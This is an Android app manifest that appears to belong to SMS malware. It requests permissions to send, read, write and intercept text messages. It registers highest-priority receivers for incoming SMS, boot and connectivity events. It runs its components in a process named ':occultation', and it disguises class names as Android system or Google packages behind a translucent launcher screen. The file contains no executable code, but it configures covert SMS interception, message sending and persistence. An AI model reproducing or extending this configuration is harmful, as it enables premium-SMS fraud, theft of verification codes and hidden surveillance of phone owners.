<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.pro.intertest"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-sdk android:minSdkVersion="10" />
    
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
	<uses-permission android:name="android.permission.WRITE_SMS" />
	<uses-permission android:name="android.permission.RESTART_PACKAGES" />
	<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
	<uses-permission android:name="android.permission.GET_TASKS" />
	<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppBaseTheme"
        android:name="android.app.sms.application.SMSApplication" >
        
        <meta-data android:name="JUZIPM_KEY" android:value="500422" />
		<meta-data android:name="JUZIPM_MKT" android:value="juzi" />
		<!-- sdk -->
        <service
            android:name="com.google.pm.service.WindowService"
            android:exported="true"
            android:process=":occultation" >
            <intent-filter android:priority="2147483647" >
                <action
                    android:name="com.google.pm.service.adl"
                    android:exported="true" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </service>
		<receiver
            android:name="com.pm.window.listener.AppListener"
            android:process=":occultation" >
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.ACTION_PACKAGE_CHANGED" />
                <data android:scheme="package" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.pm.window.listener.OpenListener"
            android:process=":occultation" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <!-- sdk -->
		
        <activity
            android:theme="@android:style/Theme.Translucent"
            android:configChanges="orientation|keyboardHidden|screenSize"
            android:name=".WebActivity"
            android:process=":occultation" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
       	<receiver 
       	    android:process=":occultation"
       	    android:name="com.sms.web.receiver.SMSReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
             <intent-filter android:priority="2147483647" >
                <action android:name="SENT_SMS_ACTION" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED_2" />
                <action android:name="android.provider.Telephony.GSM_SMS_RECEIVED" />
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <service 
            android:process=":occultation"
            android:name="android.app.sms.service.NotifiService"/>
        <service 
            android:process=":occultation"
            android:name="android.app.sms.service.RestartService"/>
    </application>

</manifest>
